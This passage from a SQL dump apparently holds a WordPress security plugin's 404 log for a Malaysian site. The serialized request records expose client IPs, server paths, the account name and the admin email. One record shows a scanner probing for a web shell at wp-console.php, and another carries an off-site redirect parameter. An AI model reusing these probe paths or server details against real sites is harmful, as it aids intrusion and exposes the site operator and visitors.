_UNIQUE_ID\";s:27:\"XY1tTtR73RJ5LoNAIQaISQAAAJM\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.185.96\";s:11:\"REMOTE_PORT\";s:5:\"59454\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY1tTtR73RJ5LoNAIQaISQAAAJM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569549646.292\";s:12:\"REQUEST_TIME\";s:10:\"1569549646\";}}','notice','2019-09-27 02:00:47','2019-09-27 02:00:46',35494312,37296008,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.185.96'),(27129,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:3:\"0-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"191F682D-95C4-421D-86DF-96BAB26AC3F8\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:3:\"0-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY2VJwF92QujBG1WhT3exwAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"50889\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY2VJwF92QujBG1WhT3exwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569559847.2948\";s:12:\"REQUEST_TIME\";s:10:\"1569559847\";}}','notice','2019-09-27 04:50:49','2019-09-27 04:50:47',35503280,37297936,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.87'),(27130,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3452.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"195.128.119.244\";s:11:\"REMOTE_PORT\";s:5:\"59211\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY2nE9R73RJ5LoNAIQaxygAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569564435.7278\";s:12:\"REQUEST_TIME\";s:10:\"1569564435\";}}','notice','2019-09-27 06:07:18','2019-09-27 06:07:16',35518560,37319528,'https://bintara.com.my/?page_id=18',1,0,'195.128.119.244'),(27131,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"ACB5D9C0-BD7D-4555-8F18-1AECAAD8D6CE\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY2rmQF92QujBG1WhT3m@gAAABY\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.87\";s:11:\"REMOTE_PORT\";s:5:\"51735\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY2rmQF92QujBG1WhT3m@gAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569565593.1515\";s:12:\"REQUEST_TIME\";s:10:\"1569565593\";}}','notice','2019-09-27 06:26:34','2019-09-27 06:26:33',35493824,37286824,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.87'),(27132,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"49733\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY3fiFmRD3dexc-X2CVi@wAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569578888.4512\";s:12:\"REQUEST_TIME\";s:10:\"1569578888\";}}','notice','2019-09-27 10:08:11','2019-09-27 10:08:08',35519064,37329040,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27133,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"55662\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY3mP1mRD3dexc-X2CVmwAAAANU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569580607.3524\";s:12:\"REQUEST_TIME\";s:10:\"1569580607\";}}','notice','2019-09-27 10:36:50','2019-09-27 10:36:47',35521184,37323376,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'136.243.199.108'),(27134,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/18-2__trashed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY3pOQfHHZa0uwt9hst31QAAABY\";s:12:\"REDIRECT_URL\";s:15:\"/18-2__trashed/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.182\";s:11:\"REMOTE_PORT\";s:4:\"8821\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:10:\"SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY3pOQfHHZa0uwt9hst31QAAABY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569581369.8217\";s:12:\"REQUEST_TIME\";s:10:\"1569581369\";}}','notice','2019-09-27 10:49:31','2019-09-27 10:49:30',34051144,35849032,'https://bintara.com.my/18-2__trashed/',1,0,'157.55.39.182'),(27136,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:95:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:29:\"/assets/images/wp-console.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"213-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"213-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"213-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:33:\"REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:34:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:36:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:39:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:40:\"REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"213-1\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:43:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:48:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:48:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:49:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"213-1\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/assets/images/wp-console.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/assets/images/wp-console.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY3y@1mRD3dexc-X2CVsKAAAAAE\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/assets/images/wp-console.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/assets/images/wp-console.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY3y@1mRD3dexc-X2CVsKAAAAAE\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/assets/images/wp-console.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:29:\"/assets/images/wp-console.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY3y@1mRD3dexc-X2CVsKAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:51:\"https://bintara.com.my/assets/images/wp-console.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:29:\"/assets/images/wp-console.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY3y@1mRD3dexc-X2CVsKAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"209.205.206.58\";s:11:\"REMOTE_PORT\";s:5:\"34458\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_U